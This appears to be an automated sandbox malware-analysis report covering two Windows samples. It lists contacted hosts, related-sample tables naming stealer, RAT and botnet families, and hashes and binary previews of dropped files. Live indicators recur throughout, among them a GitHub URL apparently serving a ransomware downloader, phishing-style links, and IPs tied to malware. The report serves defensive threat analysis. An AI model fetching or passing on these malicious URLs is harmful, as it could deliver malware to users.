• Excluded IPs from analysis (whitelisted): 23.218.208.109, 40.126.53.16, 20.223.35.26, 13.107.246.63, 2.16.158.179, 52.149.20.212, 150.171.27.10, 2.16.158.83, 20.199.58.43
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
• Execution Graph export aborted for target pyld611114.exe, PID 7528 because there are no executed functions
• Execution Graph export aborted for target usvcinsta64.exe, PID 4900 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• VT rate limit hit for: pyld611114.exe
Time | Type | Description
06:41:23 | API Interceptor | 116x Sleep call for process: powershell.exe modified
06:41:30 | API Interceptor | 8x Sleep call for process: svchost.exe modified
06:41:47 | API Interceptor | 2x Sleep call for process: console_zero.exe modified
12:41:47 | Task Scheduler | Run new task: console_zero path: C:\Windows\System32\console_zero.exe
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 34.117.59.81
  file.exe | malicious | Invicta Stealer, XWorm | ipinfo.io/json
  Code%20Send%20meta%20Discord%20EXE.ps1 | malicious | Unknown | ipinfo.io/json
  idl57nk7gk.exe | malicious | Neshta | ipinfo.io/json
  idl57nk7gk.exe | malicious | Neshta | ipinfo.io/json
  FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd | malicious | Unknown | ipinfo.io/json
  172.104.150.66.ps1 | malicious | Unknown | ipinfo.io/json
  VertusinstruccionesFedEX_66521.zip | malicious | Unknown | ipinfo.io/json
  UjbjOP.ps1 | malicious | Unknown | ipinfo.io/json
  I9xuKI2p2B.ps1 | malicious | Unknown | ipinfo.io/json
  licarisan_api.exe | malicious | Icarus | ipinfo.io/ip

Match: 188.116.21.204
  dYUteuvmHn.exe | malicious | Unknown |
  SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe | malicious | Unknown |
  app64.exe | malicious | Unknown |

Match: 20.233.83.145
  Y5kEUsYDFr.exe | malicious | Unknown | github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe
Associated Sample Name / URL | Detection | Threat Name | Context

Match: ipinfo.io
  YF3YnL4ksc.exe | malicious | Unknown | 34.117.59.81
  YF3YnL4ksc.exe | malicious | Unknown | 34.117.59.81
  https://bu.marcel-andree.de/ | malicious | Unknown | 34.117.59.81
  1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe | malicious | Unknown | 34.117.59.81
  1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe | malicious | Unknown | 34.117.59.81
  file.exe | malicious | Unknown | 34.117.59.81
  file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar | 34.117.59.81
  file.exe | malicious | Unknown | 34.117.59.81
  file.exe | malicious | Invicta Stealer, XWorm | 34.117.59.81
  http://enteolcl.top/ | malicious | Unknown | 34.117.59.81

Match: runvrs.com
  Ld0f3NDosJ.exe | malicious | Unknown | 38.180.213.183

Match: github.com
  Lu4421.exe | malicious | AsyncRAT, DcRat, Stealerium | 20.233.83.145
  x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 140.82.113.4
  x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 20.233.83.145
  ORDER-2412180Y6890PF57682456HTVC789378909759..jar | malicious | Caesium Obfuscator, STRRAT | 20.233.83.145
  IAK4Rn3bfO.jar | malicious | Caesium Obfuscator, STRRAT | 20.233.83.145
  ORDER-24171200967.XLS..js | malicious | WSHRat, Caesium Obfuscator, STRRAT | 140.82.121.3
  3gJQoqWpxb.bat | malicious | Unknown | 140.82.113.4
  uZgbejeJkT.bat | malicious | Unknown | 20.233.83.145
  ni2OwV1y9u.bat | malicious | Unknown | 20.233.83.145
  3gJQoqWpxb.bat | malicious | Unknown | 20.233.83.145

Match: bg.microsoft.map.fastly.net
  Lu4421.exe | malicious | AsyncRAT, DcRat, Stealerium | 199.232.214.172
  do.ps1 | malicious | Unknown | 199.232.214.172
  Opdxdyeul.exe | malicious | SystemBC | 199.232.210.172
  YcxjdYUKIb.exe | malicious | PureCrypter, PureLog Stealer | 199.232.210.172
  xxx.ps1 | malicious | AsyncRAT | 199.232.210.172
  KE2yNJdV55.exe | malicious | PureCrypter | 199.232.210.172
  LA0gY3d103.exe | malicious | PureCrypter, PureLog Stealer | 199.232.210.172
  JnEZtj3vtN.exe | malicious | PureCrypter | 199.232.214.172
  uzI7DAON53.exe | malicious | PureCrypter | 199.232.210.172
  YF3YnL4ksc.exe | malicious | Unknown | 199.232.210.172
Associated Sample Name / URL | Detection | Threat Name | Context

Match: NEPHAX-ASPL
  dYUteuvmHn.exe | malicious | Unknown | 188.116.21.204
  SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe | malicious | Unknown | 188.116.21.204
  app64.exe | malicious | Unknown | 188.116.21.204
  yZcecBUXN7.exe | malicious | FormBook | 188.116.38.155
  n5CCcrkB0Q.exe | malicious | FormBook | 188.116.38.155
  2x6j7GSmbu.exe | malicious | FormBook | 188.116.38.155
  HDTFFrAXui.exe | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc | 91.203.133.60
  oOXIv15Q0s.exe | malicious | Remcos | 188.116.23.142
  vN2gDDbcxM.exe | malicious | RedLine | 188.116.21.141
  https://deepakroadlines.in/styles?i3=5mmdc://t987-h91k7o-ulwvpvlzu.w.lg8o7cmlm4slddc.37m?4c=dGFyYS5sYWZlcmxhQGdlbGl0YS5jb20= | malicious | Unknown | 91.203.134.140

Match: FASTLYUS
  Lu4421.exe | malicious | Stealerium | 185.199.111.133
  Lu4421.exe | malicious | AsyncRAT, DcRat, Stealerium | 185.199.108.133
  do.ps1 | malicious | Unknown | 151.101.1.91
  http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32 | malicious | Unknown | 151.101.194.208
  urS3jQ9qb5.jar | malicious | Can Stealer | 185.199.109.133
  urS3jQ9qb5.jar | malicious | Can Stealer | 185.199.110.133
  x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 185.199.108.133
  x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 185.199.110.133
  http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 | malicious | Unknown | 151.101.2.137
  ORDER-2412180Y6890PF57682456HTVC789378909759..jar | malicious | Caesium Obfuscator, STRRAT | 199.232.192.209

Match: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
  do.ps1 | malicious | Unknown | 34.117.188.166
  YF3YnL4ksc.exe | malicious | Unknown | 34.117.59.81
  YF3YnL4ksc.exe | malicious | Unknown | 34.117.59.81
  arm5.nn-20241218-0633.elf | malicious | Mirai, Okiru | 34.65.20.112
  https://walli.shanga.co/image/view/?id=1375 | malicious | Unknown | 34.117.188.166
  http://inspirafinancial.com | malicious | Unknown | 34.117.77.79
  tightvnc-2.8.59-gpl-setup-64bit.msi | malicious | Unknown | 34.117.188.166
  https://bu.marcel-andree.de/ | malicious | Unknown | 34.117.59.81
  174 Power Global_Enrollment_.docx.doc | malicious | Unknown | 34.117.42.160
  174 Power Global_Enrollment_.docx.doc | malicious | Unknown | 34.117.42.160

Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
  Lu4421.exe | malicious | AsyncRAT, DcRat, Stealerium | 20.233.83.145
  http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32 | malicious | Unknown | 52.170.203.157
  EXTERNALRe.msg | malicious | Unknown | 52.182.143.210
  x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 20.233.83.145
  https://syndiclair-my.sharepoint.com/:o:/g/personal/ml_syndiclair_fr/En8EbZMYpZ5CodZQ05mt4IMBGZHEHcSylnIeMh0DoULmZw?e=UkXb4Y | malicious | Unknown | 13.107.136.10
  x86_64.nn.elf | malicious | Mirai, Okiru | 21.50.39.179
  mips.nn.elf | malicious | Mirai, Okiru | 21.52.221.95
  sparc.nn.elf | malicious | Mirai, Okiru | 137.117.24.119
  arm5.nn-20241218-0633.elf | malicious | Mirai, Okiru | 22.4.220.86
  arm.nn-20241218-0633.elf | malicious | Mirai, Okiru | 52.155.199.154
Associated Sample Name / URL | Detection | Threat Name | Context

Match: bd0bf25947d4a37404f0424edf4db9ad
  dYUteuvmHn.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  SecuriteInfo.com.Win64.Evo-gen.6610.27408.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  SecuriteInfo.com.Win64.Evo-gen.9614.31304.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  app64.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  SecuriteInfo.com.FileRepMalware.12585.5759.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  sadfwqefrqw3f.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
  SecuriteInfo.com.Win64.Evo-gen.20107.17462.exe | malicious | Unknown | 20.233.83.145, 185.199.110.133, 34.117.59.81
Associated Sample Name / URL | Detection | Threat Name | Context

Match: C:\Windows \System32\printui.exe
  dYUteuvmHn.exe | malicious | Unknown |
  SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe | malicious | Unknown |
  app64.exe | malicious | Unknown |
  printui.dll | malicious | Unknown |
  SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe | malicious | Unknown |
  F.7z | malicious | Unknown |
  Ld0f3NDosJ.exe | malicious | Unknown |

Match: C:\Windows \System32\printui.dll
  Ld0f3NDosJ.exe | malicious | Unknown |
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.72634112734243
Encrypted: false
SSDEEP: 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0O:9JZj5MiKNnNhoxuv
MD5: 7E57EADED0C9A2452DDBB1A9885BE0C0
SHA1: 43D8F05890CE6948F44056B666F05BC9B7507D13
SHA-256: 27B77A01CDD6C95DA8562C2DE161196F302D187981FB828B7A87C99A76244F34
SHA-512: AD954E07F0A63733E543530890A3D86B42A9828C76AD98C665D8D6B407287701A473DAD95FDDC3652B5578F682B833CB02379AE39C962CE877FE6E3152CF3EEE
Malicious: false
Preview: ...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage user DataBase, version 0x620, checksum 0x81761177, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7556167585716443
Encrypted: false
SSDEEP: 1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
                                                                                          MD5:B230835CFF75C857EC373863AAD2B66D
                                                                                          SHA1:0F2089BDD8B791061A3979F5A7543935D6E40F30
                                                                                          SHA-256:9F163F9F3E63158851905DE6A5BF873D8BF64133F294906E6960DDACC27AAC70
                                                                                          SHA-512:C728D33722C811EB15B9218DDBF06B48A1BAC4B47A54FB0A5E07D814D44D6B1046CBDE1DD86A838D7A204004839F184B3B8A9A4CB6493A0FDF6D8F74AE4444BB
                                                                                          Malicious:false
                                                                                          Preview:.v.w... .......7.......X\...;...{......................0.e......!...{?..)...|c.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................t...)...|c..................v.&.)...|c..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):0.07902106620261667
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:9rlSl8YeMvnIKg3NaAPaU1lOw3K/lAlluxmO+l/SNxOf:26z8n9ANDPaU2jAgmOH
                                                                                          MD5:C5E017BC6A66B4F63025B198467EC509
                                                                                          SHA1:E9BF5DD4CF63112A9A42C9D0B4A0DD8D7F697534
                                                                                          SHA-256:878D73D1DF80A37E9312FF1E8980636E93D14BCAD31BA547259BAEBD612960B4
                                                                                          SHA-512:F5779F8B4D43D95D39A79D43BCE8813FBE567F923EF66B7F0760F7B657E6DEC6C408C80B28ACFD1FF93BAB989348E5AB0631EC222792829369720E9D61DFF6D7
                                                                                          Malicious:false
                                                                                          Preview:.........................................;...{...)...|c..!...{?..........!...{?..!...{?..g...!...{?..................v.&.)...|c.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\crypti.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16
                                                                                          Entropy (8bit):3.875
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ktUOI2Gn:kI2Gn
                                                                                          MD5:B101F729FB1107BF23CE00FBF4A10A7F
                                                                                          SHA1:A65B1C3C3C56A10D62B8FF00E7F10BA1E54AA58B
                                                                                          SHA-256:B2F87025C70B31CBF2BC3E3A6995A93B0F469A8D72AB7E45C73D1DCFB49135CB
                                                                                          SHA-512:8FA5EE1410B19549497D974F705D95ED603E59AE1BAD3D6DCBC0AB7B9AE41242C3871CAF7354163692154D80990EB3788670F084650CE32EBE94E1508CB9CB96
                                                                                          Malicious:false
                                                                                          Preview:!...S..%.e..-.c
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\usvcinsta64.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):14262784
                                                                                          Entropy (8bit):6.551982111344916
                                                                                          Encrypted:false
                                                                                          SSDEEP:393216:BPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:BITkS6
                                                                                          MD5:6CD5395F5675ABBF7644268F0023B0BD
                                                                                          SHA1:F64379354EF7D7261D7C8250F98C515DDBDF577D
                                                                                          SHA-256:397A1DD2D8DCDE26F5D22AE33AFBF6C6201920F8D27EE213B65896FE99944239
                                                                                          SHA-512:5CBD0A6346638FEC900723CD0FECFBE6A7E8449175F297462EFFC92B4436737F4CC9C433F94A0F61F89DEC1F77EF56132CB750AFAE4E7AA57CA318DA3DDA9BDA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: Ld0f3NDosJ.exe, Detection: malicious
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#.X.#.X.#.X...Y`#.X...Y.#.X...Y.#.X..Y.#.X..Y.#.X..Y.#.X...Y.#.X.#.XZ#.X...Y.#.X..vX.#.X...Y.#.XRich.#.X................PE..d....B.f.........." ...). ..........(}....................................................`..................................................O..<................,......................8...........................P...@............0..H............................text............ .................. ..`.rdata...*...0...,...$..............@..@.data....*...`.......P..............@....pdata...,...........f..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\usvcinsta64.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):64000
                                                                                          Entropy (8bit):6.336447440888565
                                                                                          Encrypted:false
